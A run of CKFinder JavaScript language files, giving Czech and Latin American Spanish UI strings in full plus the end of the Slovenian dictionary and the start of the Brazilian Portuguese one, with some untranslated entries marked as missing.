'sl', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd.m.yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mape', FolderLoading : 'Nalagam...', FolderNew : 'Vnesite ime za novo mapo: ', FolderRename : 'Vnesite ime nove mape: ', FolderDelete : 'Ali ste prepričani, da želite zbrisati mapo "%1"?', FolderRenaming : ' (Preimenujem...)', FolderDeleting : ' (Brišem...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Vnesite novo ime datoteke: ', FileRenameExt : 'Ali ste prepričani, da želite spremeniti končnico datoteke? Možno je, da potem datoteka ne bo uporabna.', FileRenaming : 'Preimenujem...', FileDelete : 'Ali ste prepričani, da želite izbrisati datoteko "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Nalagam...', FilesEmpty : 'Prazna mapa', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Koš', BasketClear : 'Izprazni koš', BasketRemove : 'Odstrani iz koša', BasketOpenFolder : 'Odpri izvorno mapo', BasketTruncateConfirm : 'Ali res želite odstraniti vse datoteke iz koša?', BasketRemoveConfirm : 'Ali res želite odstraniti datoteko "%1" iz koša?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'V košu ni datotek. Lahko jih povlečete in spustite.', BasketCopyFilesHere : 'Kopiraj datoteke iz koša', BasketMoveFilesHere : 'Premakni datoteke iz koša', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Naloži na strežnik', UploadTip : 'Naloži novo datoteko na strežnik', Refresh : 'Osveži', Settings : 'Nastavitve', Help : 'Pomoč', HelpTip : 'Pomoč', // Context Menus Select : 'Izberi', SelectThumbnail : 'Izberi malo sličico (predogled)', View : 'Predogled', Download : 'Prenesi na svoj računalnik', NewSubFolder : 'Nova podmapa', Rename : 'Preimenuj', Delete : 'Zbriši', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopiraj', MoveDragDrop : 'Premakni', // Dialogs RenameDlgTitle : 'Preimenuj', NewNameDlgTitle : 'Novo ime', FileExistsDlgTitle : 'Datoteka že obstaja', SysErrorDlgTitle : 'Sistemska napaka', FileOverwrite : 'Prepiši', FileAutorename : 'Avtomatsko preimenuj', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Potrdi', CancelBtn : 'Prekliči', CloseBtn : 'Zapri', // Upload Panel UploadTitle : 'Naloži novo datoteko na strežnik', UploadSelectLbl : 'Izberi datoteko za prenos na strežnik', UploadProgressLbl : '(Prenos na strežnik poteka, prosimo počakajte...)', UploadBtn : 'Prenesi izbrano datoteko na strežnik', UploadBtnCancel : 'Prekliči', UploadNoFileMsg : 'Prosimo izberite datoteko iz svojega računalnika za prenos na strežnik.', UploadNoFolder : 'Izberite mapo v katero se bo naložilo datoteko!', UploadNoPerms : 'Nalaganje datotek ni dovoljeno.', UploadUnknError : 'Napaka pri pošiljanju datoteke.', UploadExtIncorrect : 'V tej mapi ta vrsta datoteke ni dovoljena.', // Flash Uploads UploadLabel : 'Datoteke za prenos', UploadTotalFiles : 'Skupaj datotek:', UploadTotalSize : 'Skupaj velikost:', UploadSend : 'Naloži na strežnik', UploadAddFiles : 'Dodaj datoteke', UploadClearFiles : 'Počisti datoteke', UploadCancel : 'Prekliči prenos', UploadRemove : 'Odstrani', UploadRemoveTip : 'Odstrani !f', UploadUploaded : 'Prenešeno !n%', UploadProcessing : 'Delam...', // Settings Panel SetTitle : 'Nastavitve', SetView : 'Pogled:', SetViewThumb : 'majhne sličice', SetViewList : 'seznam', SetDisplay : 'Prikaz:', SetDisplayName : 'ime datoteke', SetDisplayDate : 'datum', SetDisplaySize : 'velikost datoteke', SetSort : 'Razvrščanje:', SetSortName : 'po imenu datoteke', SetSortDate : 'po datumu', SetSortSize : 'po velikosti', SetSortExtension : 'po končnici', // Status Bar FilesCountEmpty : '<Prazna mapa>', FilesCountOne : '1 datoteka', FilesCountMany : '%1 datotek(e)', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Prišlo je do napake. (Napaka %1)', Errors : { 10 : 'Napačen ukaz.', 11 : 'V poizvedbi ni bil jasen tip (resource type).', 12 : 'Tip datoteke ni primeren.', 102 : 'Napačno ime mape ali datoteke.', 103 : 'Vašega ukaza se ne da izvesti zaradi težav z avtorizacijo.', 104 : 'Vašega ukaza se ne da izvesti zaradi težav z nastavitvami pravic v datotečnem sistemu.', 105 : 'Napačna končnica datoteke.', 109 : 'Napačna zahteva.', 110 : 'Neznana napaka.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Datoteka ali mapa s tem imenom že obstaja.', 116 : 'Mapa ni najdena. Prosimo osvežite okno in poskusite znova.', 117 : 'Datoteka ni najdena. Prosimo osvežite seznam datotek in poskusite znova.', 118 : 'Začetna in končna pot je ista.', 201 : 'Datoteka z istim imenom že obstaja. Naložena datoteka je bila preimenovana v "%1".', 202 : 'Neprimerna datoteka.', 203 : 'Datoteka je prevelika in zasede preveč prostora.', 204 : 'Naložena datoteka je okvarjena.', 205 : 'Na strežniku ni na voljo začasna mapa za prenos datotek.', 206 : 'Nalaganje je bilo prekinjeno zaradi varnostnih razlogov. Datoteka vsebuje podatke, ki spominjajo na HTML kodo.', 207 : 'Naložena datoteka je bila preimenovana v "%1".', 300 : 'Premikanje datotek(e) ni uspelo.', 301 : 'Kopiranje datotek(e) ni uspelo.', 500 : 'Brskalnik je onemogočen zaradi varnostnih razlogov. Prosimo kontaktirajte upravljalca spletnih strani.', 501 : 'Ni podpore za majhne sličice (predogled).' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Ime datoteke ne more biti prazno.', FileExists : 'Datoteka %s že obstaja.', FolderEmpty : 'Mapa ne more biti prazna.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Ime datoteke ne sme vsebovati naslednjih znakov: \n\\ / : * ? " < > |', FolderInvChar : 'Ime mape ne sme vsebovati naslednjih znakov: \n\\ / : * ? " < > |', PopupBlockView : 'Datoteke ni možno odpreti v novem oknu. Prosimo nastavite svoj brskalnik tako, da bo dopuščal odpiranje oken (popups) oz. izklopite filtre za blokado odpiranja oken.', XmlError : 'Nalaganje XML odgovora iz strežnika ni uspelo.', XmlEmpty : 'Nalaganje XML odgovora iz strežnika ni uspelo. Strežnik je vrnil prazno sporočilo.', XmlRawResponse : 'Surov odgovor iz strežnika je: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Spremeni velikost slike %s', sizeTooBig : 'Širina ali višina slike ne moreta biti večji kot je originalna velikost (%size).', resizeSuccess : 'Velikost slike je bila uspešno spremenjena.', thumbnailNew : 'Kreiraj novo majhno sličico', thumbnailSmall : 'majhna (%s)', thumbnailMedium : 'srednja (%s)', thumbnailLarge : 'velika (%s)', newSize : 'Določite novo velikost', width : 'Širina', height : 'Višina', invalidHeight : 'Nepravilna višina.', invalidWidth : 'Nepravilna širina.', invalidName : 'Nepravilno ime datoteke.', newImage : 'Kreiraj novo sliko', noExtensionChange : 'Končnica datoteke se ne more spremeniti.', imageSmall : 'Izvorna slika je premajhna.', contextMenuName : 'Spremeni velikost', lockRatio : 'Zakleni razmerje', resetSize : 'Ponastavi velikost' }, // Fileeditor plugin Fileeditor : { save : 'Shrani', fileOpenError : 'Datoteke ni mogoče odpreti.', fileSaveSuccess : 'Datoteka je bila shranjena.', contextMenuName : 'Uredi', loadingFile : 'Nalaganje datoteke, prosimo počakajte ...' }, Maximize : { maximize : 'Maksimiraj', minimize : 'Minimiraj' }, Gallery : { current : 'Slika {current} od {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Czech * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['cs'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nedostupné</span>', confirmCancel : 'Některá z nastavení byla změněna. Skutečně chcete dialogové okno zavřít?', ok : 'OK', cancel : 'Zrušit', confirmationTitle : 'Potvrzení', messageTitle : 'Informace', inputTitle : 'Otázka', undo : 'Zpět', redo : 'Znovu', skip : 'Přeskočit', skipAll : 'Přeskočit vše', makeDecision : 'Co by se mělo provést?', rememberDecision: 'Zapamatovat si mé rozhodnutí' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'cs', LangCode : 'cs', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd/m/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Složky', FolderLoading : 'Načítání...', FolderNew : 'Zadejte název nové složky: ', FolderRename : 'Zadejte nový název složky: ', FolderDelete : 'Opravdu chcete složku "%1" smazat?', FolderRenaming : ' (Přejmenovávání...)', FolderDeleting : ' (Mazání...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Zadejte nový název souboru: ', FileRenameExt : 'Opravdu chcete změnit příponu souboru? Soubor se může stát nepoužitelným.', FileRenaming : 'Přejmenovávání...', FileDelete : 'Opravdu chcete smazat soubor "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Načítání...', FilesEmpty : 'Prázdná složka.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Košík', BasketClear : 'Vyčistit Košík', BasketRemove : 'Odstranit z Košíku', BasketOpenFolder : 'Otevřít nadřazenou složku', BasketTruncateConfirm : 'Opravdu chcete z Košíku odstranit všechny soubory?', BasketRemoveConfirm : 'Opravdu chcete odstranit soubor "%1" z Košíku?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'V Košíku nejsou žádné soubory, tak sem některé přetáhněte.', BasketCopyFilesHere : 'Kopírovat soubory z Košíku', BasketMoveFilesHere : 'Přesunout soubory z Košíku', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Nahrát', UploadTip : 'Nahrát nový soubor', Refresh : 'Znovu načíst', Settings : 'Nastavení', Help : 'Nápověda', HelpTip : 'Nápověda', // Context Menus Select : 'Vybrat', SelectThumbnail : 'Vybrat náhled', View : 'Zobrazit', Download : 'Uložit jako', NewSubFolder : 'Nová podsložka', Rename : 'Přejmenovat', Delete : 'Smazat', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Zkopírovat sem', MoveDragDrop : 'Přesunout sem', // Dialogs RenameDlgTitle : 'Přejmenovat', NewNameDlgTitle : 'Nový název', FileExistsDlgTitle : 'Soubor již existuje', SysErrorDlgTitle : 'Chyba systému', FileOverwrite : 'Přepsat', FileAutorename : 'Automaticky přejmenovat', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Zrušit', CloseBtn : 'Zavřít', // Upload Panel UploadTitle : 'Nahrát nový soubor', UploadSelectLbl : 'Zvolit soubor k nahrání', UploadProgressLbl : '(Probíhá nahrávání, čekejte...)', UploadBtn : 'Nahrát zvolený soubor', UploadBtnCancel : 'Zrušit', UploadNoFileMsg : 'Vyberte prosím soubor z Vašeho počítače.', UploadNoFolder : 'Před nahráváním vyberte složku prosím.', UploadNoPerms : 'Nahrávání souborů není povoleno.', UploadUnknError : 'Chyba při posílání souboru.', UploadExtIncorrect : 'Přípona souboru není v této složce povolena.', // Flash Uploads UploadLabel : 'Soubory k nahrání', UploadTotalFiles : 'Celkem souborů:', UploadTotalSize : 'Celková velikost:', UploadSend : 'Nahrát', UploadAddFiles : 'Přidat soubory', UploadClearFiles : 'Vyčistit soubory', UploadCancel : 'Zrušit nahrávání', UploadRemove : 'Odstranit', UploadRemoveTip : 'Odstranit !f', UploadUploaded : 'Nahráno !n%', UploadProcessing : 'Zpracovávání...', // Settings Panel SetTitle : 'Nastavení', SetView : 'Zobrazení:', SetViewThumb : 'Náhled', SetViewList : 'Seznam', SetDisplay : 'Zobrazit:', SetDisplayName : 'Název', SetDisplayDate : 'Datum', SetDisplaySize : 'Velikost', SetSort : 'Seřazení:', SetSortName : 'Podle názvu', SetSortDate : 'Podle data', SetSortSize : 'Podle velikosti', SetSortExtension : 'Podle přípony', // Status Bar FilesCountEmpty : '<Prázdná složka>', FilesCountOne : '1 soubor', FilesCountMany : '%1 souborů', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Příkaz nebylo možné dokončit. (Chyba %1)', Errors : { 10 : 'Neplatný příkaz.', 11 : 'Typ zdroje nebyl v požadavku určen.', 12 : 'Požadovaný typ zdroje není platný.', 102 : 'Špatné název souboru, nebo složky.', 103 : 'Nebylo možné příkaz dokončit kvůli omezení oprávnění.', 104 : 'Nebylo možné příkaz dokončit kvůli omezení oprávnění souborového systému.', 105 : 'Neplatná přípona souboru.', 109 : 'Neplatný požadavek.', 110 : 'Neznámá chyba.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Soubor nebo složka se stejným názvem již existuje.', 116 : 'Složka nenalezena, prosím obnovte a zkuste znovu.', 117 : 'Soubor nenalezen, prosím obnovte seznam souborů a zkuste znovu.', 118 : 'Cesty zdroje a cíle jsou stejné.', 201 : 'Soubor se stejným názvem je již dostupný, nahraný soubor byl přejmenován na "%1".', 202 : 'Neplatný soubor.', 203 : 'Neplatný soubor. Velikost souboru je příliš velká.', 204 : 'Nahraný soubor je poškozen.', 205 : 'Na serveru není dostupná dočasná složka pro nahrávání.', 206 : 'Nahrávání zrušeno z bezpečnostních důvodů. Soubor obsahuje data podobná HTML.', 207 : 'Nahraný soubor byl přejmenován na "%1".', 300 : 'Přesunování souboru(ů) selhalo.', 301 : 'Kopírování souboru(ů) selhalo.', 500 : 'Průzkumník souborů je z bezpečnostních důvodů zakázán. Zdělte to prosím správci systému a zkontrolujte soubor nastavení CKFinder.', 501 : 'Podpora náhledů je zakázána.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Název souboru nemůže být prázdný.', FileExists : 'Soubor %s již existuje.', FolderEmpty : 'Název složky nemůže být prázdný.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Název souboru nesmí obsahovat následující znaky: \n\\ / : * ? " < > |', FolderInvChar : 'Název složky nesmí obsahovat následující znaky: \n\\ / : * ? " < > |', PopupBlockView : 'Soubor nebylo možné otevřít do nového okna. Prosím nastavte si Váš prohlížeč a zakažte veškeré blokování vyskakovacích oken.', XmlError : 'Nebylo možné správně načíst XML odpověď z internetového serveru.', XmlEmpty : 'Nebylo možné načíst XML odpověď z internetového serveru. Server vrátil prázdnou odpověď.', XmlRawResponse : 'Čistá odpověď od serveru: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Změnit velikost %s', sizeTooBig : 'Nelze nastavit šířku či výšku obrázku na hodnotu vyšší než původní velikost (%size).', resizeSuccess : 'Úspěšně změněna velikost obrázku.', thumbnailNew : 'Vytvořit nový náhled', thumbnailSmall : 'Malý (%s)', thumbnailMedium : 'Střední (%s)', thumbnailLarge : 'Velký (%s)', newSize : 'Nastavit novou velikost', width : 'Šířka', height : 'Výška', invalidHeight : 'Neplatná výška.', invalidWidth : 'Neplatná šířka.', invalidName : 'Neplatný název souboru.', newImage : 'Vytvořit nový obrázek', noExtensionChange : 'Příponu souboru nelze změnit.', imageSmall : 'Zdrojový obrázek je příliš malý.', contextMenuName : 'Změnit velikost', lockRatio : 'Uzamknout poměr', resetSize : 'Původní velikost' }, // Fileeditor plugin Fileeditor : { save : 'Uložit', fileOpenError : 'Soubor nelze otevřít.', fileSaveSuccess : 'Soubor úspěšně uložen.', contextMenuName : 'Upravit', loadingFile : 'Načítání souboru, čekejte prosím...' }, Maximize : { maximize : 'Maximalizovat', minimize : 'Minimalizovat' }, Gallery : { current : 'Obrázek {current} z {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Latin American Spanish * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['es-mx'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, no disponible</span>', confirmCancel : 'Algunas opciones se han cambiado\r\n¿Está seguro de querer cerrar el diálogo?', ok : 'Aceptar', cancel : 'Cancelar', confirmationTitle : 'Confirmación', messageTitle : 'Información', inputTitle : 'Pregunta', undo : 'Deshacer', redo : 'Rehacer', skip : 'Omitir', skipAll : 'Omitir todos', makeDecision : '¿Qué acción debe realizarse?', rememberDecision: 'Recordar mi decisión' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'es-mx', LangCode : 'es-mx', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Carpetas', FolderLoading : 'Cargando...', FolderNew : 'Por favor, escriba el nombre para la nueva carpeta: ', FolderRename : 'Por favor, escriba el nuevo nombre para la carpeta: ', FolderDelete : '¿Está seguro de que quiere borrar la carpeta "%1"?', FolderRenaming : ' (Renombrando...)', FolderDeleting : ' (Borrando...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Por favor, escriba el nuevo nombre del archivo: ', FileRenameExt : '¿Está seguro de querer cambiar la extensión del archivo? El archivo puede dejar de ser usable.', FileRenaming : 'Renombrando...', FileDelete : '¿Está seguro de que quiere borrar el archivo "%1".?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Cargando...', FilesEmpty : 'Carpeta vacía', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Cesta', BasketClear : 'Vaciar cesta', BasketRemove : 'Quitar de la cesta', BasketOpenFolder : 'Abrir carpeta padre', BasketTruncateConfirm : '¿Está seguro de querer quitar todos los archivos de la cesta?', BasketRemoveConfirm : '¿Está seguro de querer quitar el archivo "%1" de la cesta?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'No hay archivos en la cesta, arrastra y suelta algunos.', BasketCopyFilesHere : 'Copiar archivos de la cesta', BasketMoveFilesHere : 'Mover archivos de la cesta', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Añadir', UploadTip : 'Añadir nuevo archivo', Refresh : 'Actualizar', Settings : 'Configuración', Help : 'Ayuda', HelpTip : 'Ayuda', // Context Menus Select : 'Seleccionar', SelectThumbnail : 'Seleccionar el icono', View : 'Ver', Download : 'Descargar', NewSubFolder : 'Nueva Subcarpeta', Rename : 'Renombrar', Delete : 'Borrar', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copiar aquí', MoveDragDrop : 'Mover aquí', // Dialogs RenameDlgTitle : 'Renombrar', NewNameDlgTitle : 'Nuevo nombre', FileExistsDlgTitle : 'Archivo existente', SysErrorDlgTitle : 'Error de sistema', FileOverwrite : 'Sobreescribir', FileAutorename : 'Auto-renombrar', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Aceptar', CancelBtn : 'Cancelar', CloseBtn : 'Cerrar', // Upload Panel UploadTitle : 'Añadir nuevo archivo', UploadSelectLbl : 'Elija el archivo a subir', UploadProgressLbl : '(Subida en progreso, por favor espere...)', UploadBtn : 'Subir el archivo elegido', UploadBtnCancel : 'Cancelar', UploadNoFileMsg : 'Por favor, elija un archivo de su computadora.', UploadNoFolder : 'Por favor, escoja la carpeta antes de iniciar la subida.', UploadNoPerms : 'No puede subir archivos.', UploadUnknError : 'Error enviando el archivo.', UploadExtIncorrect : 'La extensión del archivo no está permitida en esta carpeta.', // Flash Uploads UploadLabel : 'Archivos a subir', UploadTotalFiles : 'Total de archivos:', UploadTotalSize : 'Tamaño total:', UploadSend : 'Añadir', UploadAddFiles : 'Añadir archivos', UploadClearFiles : 'Borrar archivos', UploadCancel : 'Cancelar subida', UploadRemove : 'Quitar', UploadRemoveTip : 'Quitar !f', UploadUploaded : 'Enviado !n%', UploadProcessing : 'Procesando...', // Settings Panel SetTitle : 'Configuración', SetView : 'Vista:', SetViewThumb : 'Iconos', SetViewList : 'Lista', SetDisplay : 'Mostrar:', SetDisplayName : 'Nombre de archivo', SetDisplayDate : 'Fecha', SetDisplaySize : 'Tamaño del archivo', SetSort : 'Ordenar:', SetSortName : 'por Nombre', SetSortDate : 'por Fecha', SetSortSize : 'por Tamaño', SetSortExtension : 'por Extensión', // Status Bar FilesCountEmpty : '<Carpeta vacía>', FilesCountOne : '1 archivo', FilesCountMany : '%1 archivos', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'No ha sido posible completar la solicitud. (Error %1)', Errors : { 10 : 'Comando incorrecto.', 11 : 'El tipo de recurso no ha sido especificado en la solicitud.', 12 : 'El tipo de recurso solicitado no es válido.', 102 : 'Nombre de archivo o carpeta no válido.', 103 : 'No se ha podido completar la solicitud debido a las restricciones de autorización.', 104 : 'No ha sido posible completar la solicitud debido a restricciones en el sistema de archivos.', 105 : 'La extensión del archivo no es válida.', 109 : 'Petición inválida.', 110 : 'Error desconocido.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Ya existe un archivo o carpeta con ese nombre.', 116 : 'No se ha encontrado la carpeta. Por favor, actualice y pruebe de nuevo.', 117 : 'No se ha encontrado el archivo. Por favor, actualice la lista de archivos y pruebe de nuevo.', 118 : 'Las rutas origen y destino son iguales.', 201 : 'Ya existía un archivo con ese nombre. El archivo subido ha sido renombrado como "%1".', 202 : 'Archivo inválido.', 203 : 'Archivo inválido. El tamaño es demasiado grande.', 204 : 'El archivo subido está corrupto.', 205 : 'La carpeta temporal no está disponible en el servidor para las subidas.', 206 : 'La subida se ha cancelado por razones de seguridad. El archivo contenía código HTML.', 207 : 'El archivo subido ha sido renombrado como "%1".', 300 : 'Ha fallado el mover el(los) archivo(s).', 301 : 'Ha fallado el copiar el(los) archivo(s).', 500 : 'El navegador de archivos está deshabilitado por razones de seguridad. Por favor, contacte con el administrador de su sistema y compruebe el archivo de configuración de CKFinder.', 501 : 'El soporte para iconos está deshabilitado.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'El nombre del archivo no puede estar vacío.', FileExists : 'El archivo %s ya existe.', FolderEmpty : 'El nombre de la carpeta no puede estar vacío.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'El nombre del archivo no puede contener ninguno de los caracteres siguientes: \n\\ / : * ? " < > |', FolderInvChar : 'El nombre de la carpeta no puede contener ninguno de los caracteres siguientes: \n\\ / : * ? " < > |', PopupBlockView : 'No ha sido posible abrir el archivo en una nueva ventana. Por favor, configure su navegador y desactive todos los bloqueadores de ventanas para esta página.', XmlError : 'No ha sido posible cargar correctamente la respuesta XML del servidor.', XmlEmpty : 'No ha sido posible cargar correctamente la respuesta XML del servidor. El servidor envió una cadena vacía.', XmlRawResponse : 'Respuesta del servidor: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Redimensionar %s', sizeTooBig : 'No se puede poner la altura o anchura de la imagen mayor que las dimensiones originales (%size).', resizeSuccess : 'Imagen redimensionada correctamente.', thumbnailNew : 'Crear nueva minuatura', thumbnailSmall : 'Pequeña (%s)', thumbnailMedium : 'Mediana (%s)', thumbnailLarge : 'Grande (%s)', newSize : 'Establecer nuevo tamaño', width : 'Ancho', height : 'Alto', invalidHeight : 'Altura inválida.', invalidWidth : 'Anchura inválida.', invalidName : 'Nombre no válido.', newImage : 'Crear nueva imagen', noExtensionChange : 'La extensión no se puede cambiar.', imageSmall : 'La imagen original es demasiado pequeña.', contextMenuName : 'Redimensionar', lockRatio : 'Proporcional', resetSize : 'Tamaño Original' }, // Fileeditor plugin Fileeditor : { save : 'Guardar', fileOpenError : 'No se puede abrir el archivo.', fileSaveSuccess : 'Archivo guardado correctamente.', contextMenuName : 'Editar', loadingFile : 'Cargando archivo, por favor espere...' }, Maximize : { maximize : 'Maximizar', minimize : 'Minimizar' }, Gallery : { current : 'Imagen {current} de {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Brazilian Portuguese * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['pt-br'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, indisponível</span>', confirmCancel : 'Algumas opções foram modificadas. Deseja fechar a janela realmente?', ok : 'OK', cancel : 'Cancelar', confirmationTitle : 'Confirmação', messageTitle : 'Informação', inputTitle : 'Pergunta', undo : 'Desfazer', redo : 'Refazer', skip : 'Ignorar', skipAll : 'Ignorar todos', makeDecision : 'Que ação deve ser tomada?', rememberDecision: 'Lembra minha decisão' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'pt-br', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Pastas', FolderLoading : 'Carregando...', FolderNew : 'Favor informar o nome da nova pasta: ', FolderRename : 'Favor informar o nome da nova pasta: ', FolderDelete : 'Você tem certeza que deseja apagar a pasta "%1"?', FolderRenaming : 